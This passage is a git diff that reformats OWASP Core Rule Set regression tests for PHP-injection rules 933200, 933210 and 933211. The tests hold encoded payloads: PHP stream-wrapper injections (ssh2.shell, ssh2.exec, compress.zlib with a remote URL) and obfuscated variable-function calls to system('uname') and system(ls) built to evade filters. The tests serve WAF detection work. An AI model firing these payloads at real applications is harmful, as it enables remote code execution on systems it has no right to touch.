933200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.bzip2://file.bz2" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 3 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 4 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=zip://archive.zip" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=zip://archive.zip" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 5 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=lz77://some_file.lz" - version: HTTP/1.1 - output: - no_log_contains: id 
"933200" - - test_title: 933200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=lz77://some_file.lz" + version: HTTP/1.1 + output: + no_log_contains: id "933200" + - test_id: 6 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 7 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 8 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 9 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 10 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log_contains: id "933200" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml index 49c79d906..46ba63c95 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml 
@@ -2,344 +2,322 @@ meta: author: "theMiddle, azurit" description: Test for "933210" PHP Variable Function bypass - enabled: true - name: 933210.yaml +rule_id: 933210 tests: - - test_title: 933210-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." 
+ version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-7 + - input: + dest_addr: 127.0.0.1 
+ headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 
'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id 
"933210" - - test_title: 933210-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + 
output: + log_contains: id "933210" + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: 
"x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 19 desc: Check FP if text contains quotes and round parenthesis stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 20 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 21 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" 
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml index 837538cfd..0126b067f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml 
@@ -2,344 +2,322 @@ meta: author: "karelorigin, azurit" description: Test for "933211" PHP Variable Function bypass - enabled: true - name: 933211.yaml +rule_id: 933211 tests: - - test_title: 933211-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." 
+ version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 4 desc: PHP Variable Function bypass 